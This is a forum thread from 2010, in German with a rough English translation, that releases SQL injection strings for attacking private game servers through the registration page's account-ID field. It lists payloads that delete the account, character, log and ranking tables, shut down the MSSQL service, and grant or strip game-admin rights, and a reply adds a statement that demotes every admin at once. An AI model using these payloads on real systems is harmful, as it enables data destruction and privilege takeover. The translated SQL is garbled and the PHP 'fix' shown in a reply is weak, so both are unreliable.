[Release] SQL Injection Befehle

Page 1 of 3

11/21/2010 13:13 Fullscreen#1

Heyho,

Deutsch:

ich hab f�r euch mal ein paar SQL Injection Befehle rausgesucht:

Quote:

Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!

Quote:

';delete account_tbl;--

L�scht die Accountdatenbank

Quote:

';delete character_01_tbl;--

L�scht die Characterdatenbank

Quote:

';delete logging_01_tbl;--

L�scht die Loggdatenbank

Quote:

';delete ranking_tbl;--

L�scht die Rankingdatenbank

Quote:

';shutdown;--

Schlie�t die MSSQL Verbindung!

Quote:

USE [CHARACTER_01_DBF]

UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'

USE [ACCOUNT_DBF]

UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'

Gibt deinen Charackter Adminrechte!

Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!

Wie das funktioniert?

Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!

Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!

Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!

Werde diesen Thread updaten, wenn neue bekannt sind!

English:

Quote:

Today I present a list of SQL injections!

Quote:

'; delete account_tbl ;--

Deletes the account database

Quote:

'; delete character_01_tbl, -

Deletes the character database

Quote:

'; delete logging_01_tbl, -

Clears the log database

Quote:

'; delete ranking_tbl, -

Deletes the ranking database

Quote:

'; shutdown ;--

Closes the MSSQL connection!

Quote:

USE [CHARACTER_01_DBF]

UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '

USE [ACCOUNT_DBF]

UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'

Makes your character to the admin!

So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!

How does it work?

Simply enter the code in the Page tab type where normally your accountid comes in!

It works only if the Allow server operators, special symbols

The whole thing was written by fruit to score. So credits to him!

Will update this thread when new ones are announced!

Edit1: English Translation added!

Greez,

Fullscreen

11/25/2010 19:41 Achileus#2

xD muss man das einfach in login schreiben und passwort oder wie? Wenn das so einfach w�hre lach ich mich tot!

Und was ist GameCode?

11/25/2010 21:49 Lightings#3

Dann viel Spa� beim Lachen ,
nur jeder hat sonderzeichen raus!

11/26/2010 13:35 Fullscreen#4

das hier ist nur f�r N**b Server gedacht, die zu bl�d sind, dass zu fixen.

11/26/2010 14:30 Achileus#5

Wollte mal Fragen f�r was sind die Befehle da? das man so einfach alles killen kann?

EDIT: Der Fixx ist auch einfach einfach weniger als 10 buchstaben zulassen das ist auch nen Fixx xD

11/26/2010 21:20 Fullscreen#6

das sind SQLs, also so etwas wie Batch Dateien auf Windows. Mit ihnen kannst du Servern sagen, was sie machen sollen. Da meist nur der Admin Zugriff auf die Server Database hat, kann er nur selbst Schaden verursachen.
Auf Servern, wo Sonderzeichen gesperrt sind und deine Methode angewandt wurde, geht das nicht.

Greez,

12/01/2010 11:39 pekopon321#7

can you translate it to english? please?

12/01/2010 14:08 Fullscreen#8

Quote:

can you translate it to english? please?

Yes, sure :D

12/01/2010 16:36 Skullpturra#9

ganz nett aber ich denke solche "noob" server die du da in dem text erw�hnst gibt es nicht oder nur ganz wenige : ) aber dennoch ...dadurch kann mann wirklich was lernen : ) ich meine nur die leute die einen eigenen server haben ... k�nnen sicher etwas damit anfangen
mfg. Skullptura

12/01/2010 21:50 azizcrank#10

ja toll,bringt sich ur was ...

Quote:

if(strlen($username) < 4 ||
strlen($username) > 10
{
die("Dein Benutzername ist zu kurz/lang . Er muss zwischen 4 und 10 Zeichen lang sein .");
}

der 'fix' xD

12/20/2010 17:57 .CяeαTiVe#11

Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!

12/29/2010 02:50 Steav#12

Quote:

Originally Posted by .CяeαTiVe

Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!

will dich ja nur ungern entt�uschen... aber genau das ist sql injection^^

12/29/2010 07:06 glitchz#13

can someone that speaks english tell me what exactly this is...i cant really understand his translation

12/31/2010 15:35 oberblubb#14

Quote:

UPDATE CHARACTER_TBL SET m_chAuthority='F'
WHERE m_chAuthority='Z'

so kann man sehr effektiv allen Admins die Rechte nehmen... unabh�ngig vom Charnamen...

01/02/2011 15:14 Achileus#15

Wer l�sst soviele buchstaben guten das einzigster was auf jeden p Server funtzt ist shutdown.

Page 1 of 3